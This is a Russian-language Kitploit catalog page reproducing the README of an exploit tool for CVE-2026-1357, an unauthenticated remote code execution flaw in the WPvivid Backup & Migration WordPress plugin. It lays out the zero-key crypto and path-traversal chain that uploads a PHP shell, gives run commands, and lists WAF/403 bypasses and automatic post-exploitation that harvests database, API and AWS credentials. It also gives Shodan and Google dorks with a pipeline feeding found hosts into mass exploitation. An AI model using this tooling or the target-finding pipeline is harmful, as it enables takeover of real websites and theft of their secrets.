Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-1357-POC — Автоматизированный инструмент эксплуатации для CVE-2026-1357 — неаутентифицированного RCE в WPvivid Backup & Migration. Сканирует цели WordPress, обходит WAF/403, загружает шелл через path traversal и выполняет пост-эксплуатационную разведку с генерацией отчёта. | Kitploit
Инструменты/GitHubGitHub/cybertechajju/cve-2026-1357-poc
РазведкаСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхПост-эксплуатацияОбход WAFТестирование на Проникновение

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
cybertechajju/cve-2026-1357-poc

CVE-2026-1357-POC

Автоматизированный инструмент эксплуатации для CVE-2026-1357 — неаутентифицированного RCE в WPvivid Backup & Migration. Сканирует цели WordPress, обходит WAF/403, загружает шелл через path traversal и выполняет пост-эксплуатационную разведку с генерацией отчёта.

Репозиторий
816 месяцев назадЕщё не проверено

CVE-2026-1357 — WPvivid Backup & Migration RCE

Автор CVE: Lucas Montes (NiRoX)
Инструмент: CyberTechAjju
CVSS: 9.8 (Critical) | Затронуто: ≤ 0.9.123 | Исправлено: 0.9.124


⚠️ Отказ от ответственности

Только для авторизованного тестирования безопасности. Несанкционированный доступ к системам незаконен.


Обзор

Неаутентифицированная RCE в WPvivid Backup & Migration через две связанные уязвимости:

  1. Crypto Fail-Open — openssl_private_decrypt() возвращает false при неверном ключе → phpseclib v1 обрабатывает его как AES-ключ из нулевых байтов → атакующий шифрует 16 нулевыми байтами
  2. Path Traversal — несанитизированное поле name → ../uploads/shell.php выходит за пределы каталога резервных копий

Ограничение: Эксплуатация возможна только когда wpvivid_api_token сгенерирован и не истёк.


Возможности


Установка

root@kitploit:~
git clone https://github.com/cybertechajju/CVE-2026-1357-poc.git
cd CVE-2026-1357-poc
pip install -r requirements.txt

Использование

root@kitploit:~
# Только сканирование (определение WordPress + WPvivid + версии)
python3 cve_2026_1357.py -u http://target.com

# Сканирование + эксплуатация + автоматическая постэксплуатация
python3 cve_2026_1357.py -u http://target.com --exploit

# Эксплуатация без постэксплуатационной разведки
python3 cve_2026_1357.py -u http://target.com --exploit --no-post

# Массовое сканирование с отчётом
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report

# Через прокси Burp
python3 cve_2026_1357.py -u http://target.com --exploit --proxy http://127.0.0.1:8080

# Режим только полезной нагрузки
python3 cve_2026_1357.py -u http://x --payload-only

Все параметры

root@kitploit:~
-u, --url         URL одиночной цели
-l, --list        Файл со списком URL (по одному в строке)
--exploit         Включить режим эксплуатации
--shell NAME      Имя файла шелла (по умолчанию: pwn_remote.php)
--no-post         Пропустить постэксплуатационную разведку
--report          Сгенерировать markdown PoC-отчёт
--report-dir DIR  Каталог для отчётов
-t, --threads N   Параллельные потоки (по умолчанию: 5)
--timeout SECS    Таймаут запроса (по умолчанию: 10)
--proxy URL       HTTP-прокси для Burp
--payload-only    Вывести base64-полезную нагрузку и выйти
Screenshot_2026-02-14_00_18_14 Screenshot_2026-02-14_00_18_55

Поиск целей (Dorks)

Полный список см. в dorks.md. Быстрые примеры:

root@kitploit:~
# Shodan
http.html:"wpvivid-backuprestore"
http.html:"wpvivid" http.component:"WordPress"

# Google
inurl:"/wp-content/plugins/wpvivid-backuprestore/readme.txt"

# Pipeline
shodan search 'http.html:"wpvivid-backuprestore"' --fields ip_str,port --limit 500 \
  | awk '{print "http://"$1":"$2}' > targets.txt
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report

Файлы

root@kitploit:~
CVE-2026-1357-poc/
├── cve_2026_1357.py    ← Основной инструмент (сканер + эксплойт + постэксплуатация)
├── dorks.md            ← Dorks для Shodan/Google/Censys/FOFA/ZoomEye
├── requirements.txt    ← Зависимости Python
├── .gitignore
└── README.md           ← Этот файл

Авторы

Lucas Montes (NiRoX) — обнаружение CVE
CyberTechAjju — инструмент эксплуатации

Скачать инструмент
ФункцияОписание
🔍 АвтоопределениеWordPress + плагин WPvivid + определение версии
🛡️ Обход WAFРотация User-Agent, подмена заголовков, трюки с кодированием
🔓 Обход 403X-Forwarded-For, X-Original-URL, нормализация путей, двойное кодирование
💀 АвтоэксплуатацияAES-полезная нагрузка с нулевым ключом + загрузка через path traversal
📋 ПостэксплуатацияАвтоматический запуск 20+ команд разведки (id, whoami, passwd, wp-config, SUID и т.д.)
🔑 Извлечение данныхПоиск учётных данных БД, API-ключей, паролей, AWS-ключей в выводе
📊 Генерация отчётовMarkdown PoC-отчёт с полными доказательствами эксплуатации
⚡ Массовое сканированиеМногопоточность с поддержкой прокси/Burp